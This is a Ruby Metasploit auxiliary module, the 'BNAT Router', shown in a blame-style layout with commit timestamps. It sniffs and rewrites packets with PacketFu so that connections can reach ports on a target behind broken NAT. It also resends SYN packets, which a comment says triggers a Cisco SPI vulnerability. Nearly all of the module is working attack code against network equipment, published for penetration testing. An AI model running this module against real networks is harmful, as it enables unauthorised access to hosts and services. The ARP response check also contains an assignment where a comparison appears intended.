2011-08-21 23:40:09 +00:00
|
|
|
###
|
|
|
|
# $Id$
|
|
|
|
###
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-08-21 23:40:09 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'BNAT Router',
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Description' => %q{
|
2011-10-17 02:42:01 +00:00
|
|
|
This module will properly route BNAT traffic and allow for connections to be
|
2011-08-21 23:40:09 +00:00
|
|
|
established to machines on ports which might not otherwise be accessible.},
|
2011-10-17 02:42:01 +00:00
|
|
|
'Author' =>
|
2011-08-21 23:40:09 +00:00
|
|
|
[
|
|
|
|
'bannedit',
|
|
|
|
'Jonathan Claudius',
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'https://github.com/claudijd/BNAT-Suite'],
|
|
|
|
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
|
|
|
|
]
|
|
|
|
)
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('OUTINF', [true, 'The external interface connected to the internet', 'eth1']),
|
|
|
|
OptString.new('ININF', [true, 'The internal interface connected to the network', 'eth2']),
|
|
|
|
OptString.new('CLIENTIP', [true, 'The ip of the client behing the BNAT router', '192.168.3.2']),
|
|
|
|
OptString.new('SERVERIP', [true, 'The ip of the server you are targeting', '1.1.2.1']),
|
|
|
|
OptString.new('BNATIP', [true, 'The ip of the bnat response you are getting', '1.1.2.2']),
|
|
|
|
],self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
clientip = datastore['CLIENTIP']
|
|
|
|
serverip = datastore['SERVERIP']
|
|
|
|
bnatip = datastore['BNATIP']
|
|
|
|
outint = datastore['OUTINF']
|
|
|
|
inint = datastore['ININF']
|
|
|
|
|
|
|
|
clientmac = arp2(clientip,inint)
|
|
|
|
print_line("Obtained Client MAC: #{clientmac}")
|
|
|
|
servermac = arp2(serverip,outint)
|
|
|
|
print_line("Obtained Server MAC: #{servermac}")
|
|
|
|
bnatmac = arp2(bnatip,outint)
|
|
|
|
print_line("Obtained BNAT MAC: #{bnatmac}\n\n")
|
|
|
|
|
|
|
|
#Create Interface Specific Configs
|
|
|
|
outconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{outint}").config
|
|
|
|
inconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{inint}").config
|
|
|
|
|
|
|
|
#Set Captures for Traffic coming from Outside and from Inside respectively
|
|
|
|
outpcap = PacketFu::Capture.new( :iface => "#{outint}", :start => true, :filter => "tcp and src #{bnatip}" )
|
|
|
|
print_line("Now listening on #{outint}...")
|
|
|
|
|
|
|
|
inpcap = PacketFu::Capture.new( :iface => "#{inint}", :start => true, :filter => "tcp and src #{clientip} and dst #{serverip}" )
|
|
|
|
print_line("Now listening on #{inint}...\n\n")
|
|
|
|
|
|
|
|
#Start Thread from Outside Processing
|
|
|
|
fromout = Thread.new do
|
|
|
|
loop do
|
|
|
|
outpcap.stream.each do |pkt|
|
|
|
|
packet = PacketFu::Packet.parse(pkt)
|
|
|
|
|
|
|
|
#Build a shell packet that will never hit the wire as a hack to get desired mac's
|
|
|
|
shell_pkt = PacketFu::TCPPacket.new(:config => inconfig, :timeout => 0.1, :flavor => "Windows")
|
|
|
|
shell_pkt.ip_daddr = clientip
|
|
|
|
shell_pkt.recalc
|
|
|
|
|
|
|
|
#Mangle Received Packet and Drop on the Wire
|
|
|
|
packet.ip_saddr = serverip
|
|
|
|
packet.ip_daddr = clientip
|
|
|
|
packet.eth_saddr = shell_pkt.eth_saddr
|
|
|
|
packet.eth_daddr = clientmac
|
|
|
|
packet.recalc
|
|
|
|
inj = PacketFu::Inject.new( :iface => "#{inint}", :config => inconfig )
|
|
|
|
inj.a2w(:array => [packet.to_s])
|
|
|
|
print_status("inpacket processed")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#Start Thread from Inside Processing
|
|
|
|
fromin = Thread.new do
|
|
|
|
loop do
|
|
|
|
inpcap.stream.each do |pkt|
|
|
|
|
packet = PacketFu::Packet.parse(pkt)
|
|
|
|
|
|
|
|
if packet.tcp_flags.syn == 1 && packet.tcp_flags.ack == 0
|
|
|
|
packet.ip_daddr = serverip
|
|
|
|
packet.eth_daddr = servermac
|
|
|
|
else
|
|
|
|
packet.ip_daddr = bnatip
|
|
|
|
packet.eth_daddr = bnatmac
|
|
|
|
end
|
|
|
|
|
|
|
|
#Build a shell packet that will never hit the wire as a hack to get desired mac's
|
|
|
|
shell_pkt = PacketFu::TCPPacket.new(:config=>outconfig, :timeout=> 0.1, :flavor=>"Windows")
|
|
|
|
shell_pkt.ip_daddr = serverip
|
|
|
|
shell_pkt.recalc
|
|
|
|
|
|
|
|
#Mangle Received Packet and Drop on the Wire
|
|
|
|
packet.eth_saddr = shell_pkt.eth_saddr
|
|
|
|
packet.ip_saddr=shell_pkt.ip_saddr
|
|
|
|
packet.recalc
|
|
|
|
inj = PacketFu::Inject.new( :iface => "#{outint}", :config =>outconfig )
|
|
|
|
inj.a2w(:array => [packet.to_s])
|
|
|
|
|
|
|
|
#Trigger Cisco SPI Vulnerability by Double-tapping the SYN
|
|
|
|
if packet.tcp_flags.syn == 1 && packet.tcp_flags.ack == 0
|
|
|
|
select(nil, nil, nil, 0.75)
|
|
|
|
inj.a2w(:array => [packet.to_s])
|
|
|
|
end
|
|
|
|
print_status("outpacket processed")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
fromout.join
|
|
|
|
fromin.join
|
|
|
|
end
|
|
|
|
|
|
|
|
def arp2(target_ip,int)
|
|
|
|
config = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{int}").config
|
|
|
|
arp_pkt = PacketFu::ARPPacket.new(:flavor => "Windows")
|
|
|
|
arp_pkt.eth_saddr = arp_pkt.arp_saddr_mac = config[:eth_saddr]
|
|
|
|
arp_pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"
|
|
|
|
arp_pkt.arp_daddr_mac = "00:00:00:00:00:00"
|
|
|
|
arp_pkt.arp_saddr_ip = config[:ip_saddr]
|
|
|
|
arp_pkt.arp_daddr_ip = target_ip
|
|
|
|
cap = PacketFu::Capture.new(:iface => config[:iface], :start => true, :filter => "arp src #{target_ip} and ether dst #{arp_pkt.eth_saddr}")
|
|
|
|
injarp = PacketFu::Inject.new(:iface => config[:iface])
|
|
|
|
injarp.a2w(:array => [arp_pkt.to_s])
|
|
|
|
target_mac = nil
|
|
|
|
|
|
|
|
while target_mac.nil?
|
|
|
|
if cap.save > 0
|
|
|
|
arp_response = PacketFu::Packet.parse(cap.array[0])
|
|
|
|
target_mac = arp_response.arp_saddr_mac if arp_response.arp_saddr_ip = target_ip
|
|
|
|
end
|
|
|
|
select(nil, nil, nil, 0.1) # Check for a response ten times per second.
|
|
|
|
end
|
|
|
|
return target_mac
|
|
|
|
end
|
2011-10-17 02:42:01 +00:00
|
|
|
end
|